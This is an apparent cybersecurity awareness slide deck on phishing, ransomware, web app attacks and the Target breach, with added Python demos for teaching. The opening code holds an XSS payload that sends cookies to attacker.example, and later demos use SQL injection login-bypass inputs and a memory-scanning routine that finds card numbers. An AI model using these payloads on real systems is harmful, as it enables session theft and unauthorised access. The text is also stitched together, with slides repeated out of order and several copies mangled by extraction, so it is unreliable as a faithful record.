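XSS_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print("concatenated query returns:", lookup_vulnerable(db, SQLI_PAYLOAD))
    print("parameterized query returns:", lookup_safe(db, SQLI_PAYLOAD))
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_safe(XSS_PAYLOAD))
```

The same parameter mechanism also fixes the benign failure case: a customer named O'Brien breaks the concatenated query with a syntax error but is handled correctly by the parameterized one. Output escaping belongs at the point where data is written into HTML, not at input time, because the same value may later be written into SQL, a log line or a JSON response, each with its own escaping rules.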
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog, sponsored by the U.S. Department of Homeland Security, that documents publicly known cybersecurity vulnerabilities, each under a CVE identifier. Vulnerabilities are known errors in a system or software that give an attacker direct access. Exposures are known errors that give an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers using a vulnerability that had been known, and fixed by the vendor, for months or years but had not been patched at the company level.
Zero-Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero-day vulnerabilities are the most difficult to protect against and detect, because of the lack of knowledge and vendor support.
Advanced Persistent Threat (APT) – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or group targeting a specific entity.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites on the internet that are not reachable by normal search engines or means. Darknet sites require special software such as Tor (The Onion Router), which helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoin is the currency typically used there.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger (the blockchain) that, along with every Bitcoin transaction, is verified by a massive amount of computing power. Bitcoin mining is the process through which new bitcoins come into circulation: it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward of a few bitcoins. The difficulty of the puzzle, that is, the amount of computing power needed to solve it, adjusts upward as more mining power joins the network, so that blocks continue to be found at roughly the same rate.
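An added example of the mining puzzle described above, not from the presentation: a simplified Bitcoin-style proof of work. The miner tries nonces until the double SHA-256 of header plus nonce falls below a target; checking a claimed solution costs one hash, while finding one costs about 2^difficulty tries, which is why each extra bit of difficulty doubles the expected work. The header bytes are a constructed stand-in for the real block header fields.

```python
import hashlib
import struct


def block_hash(header: bytes, nonce: int) -> bytes:
    """Bitcoin-style double SHA-256 over the header with the nonce appended."""
    data = header + struct.pack("<I", nonce)
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    """The hash, read as a 256-bit integer, must be below 2**(256 - difficulty_bits),
    i.e. it must start with at least difficulty_bits zero bits."""
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32) -> tuple:
    """Search nonces from zero until the hash meets the target.
    Returns (nonce, digest, attempts); every attempt is one double hash."""
    for nonce in range(max_nonce):
        digest = block_hash(header, nonce)
        if meets_target(digest, difficulty_bits):
            return nonce, digest, nonce + 1
    raise RuntimeError("nonce space exhausted; a real miner changes the header and retries")


def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Anyone can check a claimed solution with a single hash, however long it took to find."""
    return meets_target(block_hash(header, nonce), difficulty_bits)


def expected_attempts(difficulty_bits: int) -> int:
    """Each try succeeds with probability 2**-bits, so the expected work is 2**bits hashes."""
    return 1 << difficulty_bits


# Constructed header. In Bitcoin this would be the version, previous block hash,
# merkle root of the transactions, timestamp and encoded target.
DEMO_HEADER = b"demo-block: prev=00000000deadbeef merkle=cafef00d time=1509062400 "

if __name__ == "__main__":
    for bits in (8, 12, 16, 20):
        nonce, digest, attempts = mine(DEMO_HEADER, bits)
        print(f"{bits:2d} bits: nonce={nonce:8d} attempts={attempts:8d} "
              f"expected~{expected_attempts(bits):8d} hash={digest.hex()[:16]}...")
```

The asymmetry is the whole point: a miner needs on the order of 2^bits hashes to find a valid nonce, every other node needs exactly one to check it, and the network raises the difficulty so that the expected search time stays near ten minutes no matter how much hardware joins.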
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or following the link.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (reusing a previous legitimate email) and whaling (attacking a high-level executive, or impersonating one):
• CEO email to the Treasurer requesting a payment
• HR phishing for employee data
• W-2 phishing for employee tax data (the IRS has issued a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING
Most companies counter the increase in phishing and spear-phishing attacks by labeling each email that originates outside the organization with an insert such as an [EXTERNAL] tag in the subject line or a warning banner at the top of the message body, so that a message claiming to come from the CEO but arriving from outside is visibly marked as such.
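An added example, not the presentation's own, of the two controls on the last two slides: tagging mail that originates outside the organization, and catching the "CEO email to the Treasurer" pattern, where the display name matches an executive but the address does not. In production this logic lives in the mail gateway's transport rules; the Python here shows the checks themselves. The internal domain, the protected executive name and both sample messages are constructed.

```python
import email
import re
from email.utils import parseaddr
from typing import List, Tuple

# Assumptions (not from the slides): the company's own mail domains, and the executives
# whose display names are worth protecting, mapped to their real internal addresses.
INTERNAL_DOMAINS = {"example-corp.com"}
PROTECTED_NAMES = {"jane doe": "jane.doe@example-corp.com"}
EXTERNAL_TAG = "[EXTERNAL]"


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def analyze(raw_message: str) -> Tuple[str, List[str]]:
    """Return (subject as it should be delivered, list of findings) for one inbound message."""
    msg = email.message_from_string(raw_message)
    display_name, from_addr = parseaddr(msg.get("From", ""))
    subject = msg.get("Subject", "")
    findings = []

    # Control 1: anything not from our own domains gets the external tag.
    if domain_of(from_addr) not in INTERNAL_DOMAINS:
        findings.append("external-sender")
        if not subject.startswith(EXTERNAL_TAG):
            subject = f"{EXTERNAL_TAG} {subject}"

    # Control 2: display name of a protected executive, but not their real address.
    # Titles and punctuation ("Jane Doe - CEO") are tolerated by comparing word sets.
    words = set(re.sub(r"[^a-z ]", " ", display_name.lower()).split())
    for protected, real_addr in PROTECTED_NAMES.items():
        if set(protected.split()) <= words and from_addr.lower() != real_addr:
            findings.append(f"display-name-impersonation:{protected}")

    # Control 3: replies silently routed to a different domain, typical of wire-fraud mail.
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and domain_of(reply_to) != domain_of(from_addr):
        findings.append("reply-to-domain-mismatch")

    return subject, findings


# Constructed messages (not real mail). The first is a business email compromise attempt.
BEC_MESSAGE = """\
From: "Jane Doe - CEO" <jane.doe@example-corp-mail.net>
Reply-To: jdoe.personal@webmail.example
To: treasurer@example-corp.com
Subject: Urgent wire transfer before close of business
Date: Fri, 27 Oct 2017 09:12:00 -0500

Are you at your desk? I need a wire sent to a new vendor today. Will send details.
"""

INTERNAL_MESSAGE = """\
From: "Jane Doe" <jane.doe@example-corp.com>
To: treasurer@example-corp.com
Subject: Board deck review

Please send me the Q3 numbers when you have them.
"""

if __name__ == "__main__":
    for raw in (BEC_MESSAGE, INTERNAL_MESSAGE):
        subject, findings = analyze(raw)
        print(f"{subject!r}: {findings or 'clean'}")
```

The external tag alone is the control the slide describes; the display-name check is what turns a visible-but-ignored banner into a hard stop, because a look-alike domain such as example-corp-mail.net defeats most readers but not a string comparison against the executive's real address.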
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public, distributed ledger (the blockchain) that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation: it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more computing power joins the network, the difficulty of the mining process – that is, the amount of computing power required to find a block – increases.
PHISHING
23
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or following the link.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear-phishing include cloning (reusing a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for employee tax data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING
24
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of external-sender warning insert (a tag in the subject line and/or a banner at the top of the message body).
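As an added example (not code from the presentation), the block below shows what such a labeling step does in practice: it parses a raw email with Python's standard library, decides whether the sender's address is outside the organization, prefixes the subject with a tag and prepends a banner to the text body. It also covers the CEO-to-Treasurer case from the previous slide by flagging an external sender whose display name matches a watched executive. The internal domains, tag wording, executive names and the two sample messages are constructed for the example.

```python
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from typing import Optional

# Assumed values (not from the presentation): the organization's own mail
# domains, the tag and banner wording, and the executives whose names are
# watched for display-name impersonation.
INTERNAL_DOMAINS = {"example.com", "mail.example.com"}
EXTERNAL_TAG = "[EXTERNAL]"
EXTERNAL_BANNER = (
    "CAUTION: This email originated from outside the organization. "
    "Do not click links or open attachments unless you recognize the sender "
    "and know the content is safe.\n\n"
)
WATCHED_EXECUTIVES = {"jane doe", "john roe"}   # e.g. CEO, CFO


def sender_domain(msg: EmailMessage) -> str:
    """Domain of the address part of From (the display name is ignored on purpose)."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def is_external(msg: EmailMessage) -> bool:
    return sender_domain(msg) not in INTERNAL_DOMAINS


def impersonated_executive(msg: EmailMessage) -> Optional[str]:
    """Name of the executive an external sender is posing as, or None.

    The CEO-to-Treasurer wire-fraud email usually carries the real executive's
    name in the display name and an unrelated address after it."""
    name, _ = parseaddr(msg.get("From", ""))
    name = " ".join(name.lower().split())
    return name if is_external(msg) and name in WATCHED_EXECUTIVES else None


def label_external(raw: bytes) -> EmailMessage:
    """Parse a raw message; if it came from outside, tag the subject and prepend the banner.

    Any copy of the tag the sender put in the subject themselves is removed
    first, so a message cannot arrive looking as if the gateway already
    checked it, and exactly one tag is added."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if not is_external(msg):
        return msg
    subject = str(msg.get("Subject", ""))
    while subject.startswith(EXTERNAL_TAG):
        subject = subject[len(EXTERNAL_TAG):].lstrip()
    del msg["Subject"]
    msg["Subject"] = f"{EXTERNAL_TAG} {subject}".rstrip()
    body = msg.get_body(preferencelist=("plain",))
    if body is not None:                       # HTML-only or attachment-only mail gets the tag only
        body.set_content(EXTERNAL_BANNER + body.get_content())
    return msg


# Constructed sample messages (not real traffic).
SPEAR_PHISH = b"""From: Jane Doe <jane.doe@example-mail.net>
To: treasurer@example.com
Subject: [EXTERNAL] Urgent wire transfer
Content-Type: text/plain; charset="utf-8"

Please process the attached wire today and keep this confidential.
"""

INTERNAL_NOTE = b"""From: Bob Smith <bob.smith@example.com>
To: treasurer@example.com
Subject: Lunch
Content-Type: text/plain; charset="utf-8"

Noon?
"""
```

The decision is made on the address part of From, never on the display name, because the display name is the part the attacker controls; a gateway that trusts "Jane Doe" would wave the wire-transfer request through.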
MALWARE
25
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest form of malware to make headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
26
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• Bitcoin is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 systems across 150 countries (it included a worm component, so it spread from machine to machine without any user action)
COMMON CYBER ATTACK PATTERNS
27
• 78% of all breaches result from these 5 attack patterns:
  - Web App Attacks
  - POS Intrusions
  - Privilege Misuse
  - Cyber-espionage
  - Crimeware
• 63% of all breaches are attributable to the top 2 alone
Common attack patterns account for a vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
28
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
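SQL injection is the one of these two attacks the slide does not explain, so here is an added example (not from the presentation or the Verizon report) in Python with the standard sqlite3 module: the same login lookup written the vulnerable way, with user input pasted into the query text, and the hardened way with bound parameters. The table and the two accounts in it are constructed for the example; the two payloads are the classic comment-marker and tautology inputs.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for an application's user table (constructed sample rows).

    Passwords are stored in the clear only to keep the example short; a real
    application stores a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct-horse", "admin"), ("bob", "hunter2", "staff")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Deliberately vulnerable: user input is pasted into the SQL text, so a
    quote in the input ends the string literal and the rest becomes SQL."""
    query = (
        "SELECT role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: values are bound as parameters, so quotes in input are data, not syntax."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run both versions against the same payloads and report who got in."""
    conn = build_db()
    # Two classic payloads: a comment marker that drops the password check
    # entirely, and a tautology that makes the WHERE clause true for every row.
    comment_payload = "alice' --"
    tautology = "x' OR '1'='1"
    return {
        "vuln_comment": login_vulnerable(conn, comment_payload, "wrong"),
        "vuln_tautology": login_vulnerable(conn, tautology, tautology),
        "safe_comment": login_safe(conn, comment_payload, "wrong"),
        "safe_tautology": login_safe(conn, tautology, tautology),
        "safe_legit": login_safe(conn, "alice", "correct-horse"),
        "safe_wrong_password": login_safe(conn, "alice", "wrong"),
    }
```

With the vulnerable version the first payload turns the query into `... WHERE username = 'alice' --' AND password = 'wrong'`, and everything after `--` is a comment, so the password is never checked; the parameterized version sends the same characters as a value and finds no such user.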
POINT-OF-SALE (POS) INTRUSIONS
29
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
30
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
31
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
32
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and the use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
  - Email attachment
  - Cross-site scripting from a visited website
  - Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
33
• Target Data Breach – 70 million PII records of customers and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August 2013 breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bangladesh Bank (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
34
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) with malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a web portal used for submitting electronic invoices
• Exploited a vulnerability in the electronic submission process to inject code and gain further access to Target's internal network
• Reconnoitered the environment and obtained domain administrator access
• Attackers then worked their way through various servers, using a scanner to detect which other servers they could reach from their current location, and worked around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK
35
• Gained access to a server that contained a SQL database and downloaded 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off from the rest of the network)
• Attackers then went on the darknet to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers installed malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had outbound FTP access and sent the files to themselves
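The memory-scraping step on this slide (and the POS intrusion pattern on slide 29) comes down to one operation: read process memory and pull out anything that looks like a card number. The block below is an added example, not code from the presentation, that runs that check over a constructed byte buffer standing in for a chunk of POS process memory; the card numbers in it are published test numbers. A defender can point the same function at a memory dump, a log directory or a file share to find card data sitting where it should not be (the files the attackers staged on the FTP-capable server), which is why the report function masks what it finds instead of writing the full number anywhere.

```python
import re
from typing import List

# Constructed stand-in for a chunk of POS process memory: track-1 and track-2
# style card data sit among unrelated bytes. The card numbers are published
# test numbers, not real cards.
SAMPLE_MEMORY = (
    b"\x00\x00POSAPP v3.2\x00order=1001;total=19.99\x00"
    b"%B4111111111111111^DOE/JOHN^2512101?"           # track-1 style record
    b"\x00\x00ref 1234567890123 not-a-card\x00"        # 13 digits, fails Luhn
    b";5500000000000004=2512101?\x00"                   # track-2 style record
    b"\x00log: user=clerk7 lane=4\x00"
)

# 13 to 19 consecutive digits not adjacent to other digits: the PAN length range.
PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test; weeds out most digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_pans(buf: bytes) -> List[str]:
    """Every Luhn-valid candidate in buf, in order: this is what a RAM scraper keeps."""
    return [
        m.group(1).decode("ascii")
        for m in PAN_RE.finditer(buf)
        if luhn_ok(m.group(1).decode("ascii"))
    ]


def mask(pan: str) -> str:
    """Keep the first six and last four digits (the most PCI DSS lets you display) and mask the rest."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_report(buf: bytes) -> List[str]:
    """Masked findings a defender can log or ticket without re-creating the exposure."""
    return [mask(p) for p in find_pans(buf)]
```

The digit-run regex alone would also flag order numbers and timestamps; the Luhn test is what drops the 13-digit reference number in the sample while keeping both real-format card numbers, and it is the same filter the scrapers apply so that they exfiltrate only sellable data.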
RANSOMWARE – ANATOMY OF AN ATTACK
36
BARRIERS TO EFFECTIVE CYBERSECURITY
37
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE | TECHNOLOGY | PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
39
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling to semi-qualitatively measure cybersecurity risks and to identify, estimate and prioritize information security risks
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
40
Key to an effective cybersecurity program is understanding the Company's information assets:
• What value do the assets have?
  • Credit card data
  • Employee or customer records
  • Bank accounts
  • Intellectual property
  • Trade secrets
  • Insider knowledge
• Who would want the data?
• Data location
BASELINE GAP ANALYSIS
41
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
42
Patch Management – A patch management process is a company's strategy for ensuring that its IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices on their network and are therefore unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, a failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
43
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated from the systems they protect
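Two of the fixes above (inventory your devices, then rank each device's patch risk by exposure) and the one-year statistic on the previous slide are easy to turn into a repeatable check. The block below is an added example, not the firm's methodology or code from the presentation: it reconciles a constructed asset inventory against the hosts actually observed on the network to surface devices nobody is patching because nobody knows about them, and tiers each missing patch by whether the device is internet-facing, whether the software is one of the usual targets named on the slide, and how long the vendor's fix has been available. Hostnames, products, dates and the tier thresholds are illustrative assumptions.

```python
from datetime import date
from typing import Dict, List

# Date of the presentation, used as "today" so the ages below are reproducible.
AS_OF = date(2017, 10, 27)

# Constructed sample data standing in for (a) the asset inventory / CMDB and
# (b) what the network actually shows (e.g. DHCP leases or a discovery scan).
# Hostnames, products and dates are illustrative, not from the presentation.
INVENTORY: List[Dict] = [
    # host, internet_facing, product, date the vendor released the fix, date it was installed (None = still missing)
    {"host": "web-01",  "internet_facing": True,  "product": "Apache HTTP Server", "released": date(2016, 9, 1),  "installed": None},
    {"host": "fs-02",   "internet_facing": False, "product": "Windows Server",     "released": date(2017, 3, 14), "installed": None},
    {"host": "wks-117", "internet_facing": False, "product": "Java",               "released": date(2017, 7, 18), "installed": date(2017, 8, 2)},
    {"host": "wks-118", "internet_facing": False, "product": "Adobe Reader",       "released": date(2017, 8, 8),  "installed": None},
]
OBSERVED_HOSTS = {"web-01", "fs-02", "wks-117", "wks-118", "printer-7", "hvac-ctl"}

# Software families the slide singles out as the usual targets (assumed list).
HIGH_RISK_PRODUCTS = {
    "Adobe Reader", "Adobe Flash", "Java", "Chrome", "Firefox", "Internet Explorer",
    "Windows", "Windows Server", "Linux", "macOS",
}


def unknown_devices(inventory: List[Dict], observed: set) -> List[str]:
    """Hosts seen on the network that the inventory does not know about.

    These are the devices whose patch state cannot be assessed at all."""
    known = {row["host"] for row in inventory}
    return sorted(observed - known)


def patch_priority(row: Dict, today: date) -> str:
    """Tier a device's missing patch by exposure and how long the fix has been available."""
    if row["installed"] is not None:
        return "patched"
    age = (today - row["released"]).days
    exposed = row["internet_facing"]
    risky = row["product"] in HIGH_RISK_PRODUCTS
    if exposed and age > 30:
        return "critical"       # reachable from the internet and the fix is weeks old
    if age > 365:
        return "critical"       # the window in which almost all exploited vulnerabilities sit
    if exposed or risky:
        return "high"
    return "medium"


def prioritize(inventory: List[Dict], today: date) -> List[Dict]:
    """Inventory rows annotated with tier and patch age, worst first."""
    order = {"critical": 0, "high": 1, "medium": 2, "patched": 3}
    rows = [
        dict(r, tier=patch_priority(r, today), age_days=(today - r["released"]).days)
        for r in inventory
    ]
    return sorted(rows, key=lambda r: (order[r["tier"]], -r["age_days"]))
```

Run against the sample data, the unknown-device check turns up a printer and an HVAC controller that exist on the wire but not in the inventory, and the internet-facing web server with a fix over a year old lands at the top of the list ahead of the internal file server, even though both are missing a patch for a commonly targeted product.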
QUESTIONS
44
www.STINNETT-ASSOCIATES.com | 888-808-1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300, Tulsa, OK 74137
Main Number 918-728-3300
ContactUs@Stinnett-Associates.com
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
